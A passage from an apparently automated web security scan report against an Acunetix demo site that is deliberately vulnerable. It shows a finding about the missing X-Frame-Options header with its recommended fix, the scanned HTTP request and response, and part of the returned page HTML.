mV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 22752Response body (22752 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" 